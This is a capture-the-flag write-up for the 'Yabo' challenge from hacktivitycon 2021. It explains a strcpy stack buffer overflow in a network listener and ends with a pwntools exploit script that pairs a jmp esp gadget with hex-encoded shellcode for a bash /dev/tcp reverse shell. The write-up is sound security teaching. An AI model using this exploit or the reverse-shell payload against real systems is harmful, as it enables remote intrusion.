Yabo was a basic buffer overflow challenge with executable stack.

CTFs/hacktivitycon/2021/yabo at main · 0xTen/CTFs

The binary starts a listener on port 9999 and waited for input.

The program copies the input to a 1024 bytes buffer with strcpy and thus has a buffer overflow vulnerability.
We can use a jmp esp gadget to jump to our shellcode and run it.
I used the following shellcode:
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)
Exploit Database
A simple /bin/sh shellcode wouldn't work since the remote process that receives the input is a fork, the shell will be popped on the server but won't receive input through the socket. With the shellcode I used, exploiting is as easy as appending the desired command to the shellcode, so I used a bash + /dev/tcp shell.

#!/usr/bin/env python
from pwn import *
e = context.binary = ELF('./YABO',checksec=False)
if args.REMOTE:
io = remote('challenge.ctf.games',32762)
io = remote('',9999)
ip = sys.argv[1]
port = sys.argv[2]
buf = 1044*'A'
buf += p32(0x80492e2) # jmp esp
buf += "\x31\xc0\x31\xd2\xb0\x0b\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x62\x61\x73\x68\x20\x2d\x63\x20\x22\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f" + ip + "\x2f" + port + "\x20\x30\x3e\x26\x31\x22"
Copy link
On this page
The binary
Buffer Overflow
Final Exploit